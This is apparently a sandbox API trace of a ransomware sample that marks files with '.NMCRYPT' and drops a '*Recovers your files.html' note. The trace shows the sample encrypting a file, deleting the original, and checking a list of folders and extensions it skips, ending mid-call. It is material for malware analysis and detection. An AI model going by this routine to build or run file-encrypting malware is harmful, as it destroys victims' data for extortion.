[0155.109] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.109] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.110] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.110] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0155.110] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.110] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad778) returned 1 [0155.110] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.110] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.110] wcslen (_String="\\\\?\\") returned 0x4 [0155.110] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad6b8) returned 1 [0155.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.111] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=215) returned 1 [0155.111] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.111] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0xd7, lpOverlapped=0x0) returned 1 [0155.112] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xd7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.112] GetLastError () returned 0x0 [0155.112] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.262] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.262] WriteFile (in: hFile=0x588, lpBuffer=0x28d4d40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml")) returned 0x20 [0155.262] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", dwFileAttributes=0x20) returned 0 [0155.263] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 1 [0155.263] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml")) returned 0 [0155.263] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" [0155.263] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.263] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD19B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd19b.tmp")) returned 0xd19b [0155.264] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD19B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd19b.tmp"), dwFlags=0x1) returned 0 [0155.264] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD19B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd19b.tmp")) returned 1 [0155.265] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0155.265] wcslen (_String="OK") returned 0x2 [0155.265] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.265] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.265] CryptDestroyKey (hKey=0x9ad778) returned 1 [0155.265] CryptDestroyHash (hHash=0x9ad278) returned 1 [0155.265] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0155.265] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.265] wcscmp (_String1="keypad", _String2=".") returned 1 [0155.265] wcscmp (_String1="keypad", _String2="..") returned 1 [0155.265] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*NMCRYPT") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*Recovers your files.html") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.exe") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.dll") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.lnk") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.bat") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.ini") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.msi") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*.scf") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*pagefile.sys*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*AppData*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\winrar\\*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\java\\*") returned 0 [0155.265] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\windows\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\ESET\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\AVG\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*Atheros*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*Realtek*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*bootmgr*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*boot*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*boot*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*IO.SYS*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*ntldr*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*chrome*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*opera*") returned 0 [0155.266] PathMatchSpecW (pszFile="keypad.xml", pszSpec="*firefox*") returned 0 [0155.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", pszSpec="*") returned 1 [0155.266] strlen (_Str="NMoreira") returned 0x8 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: 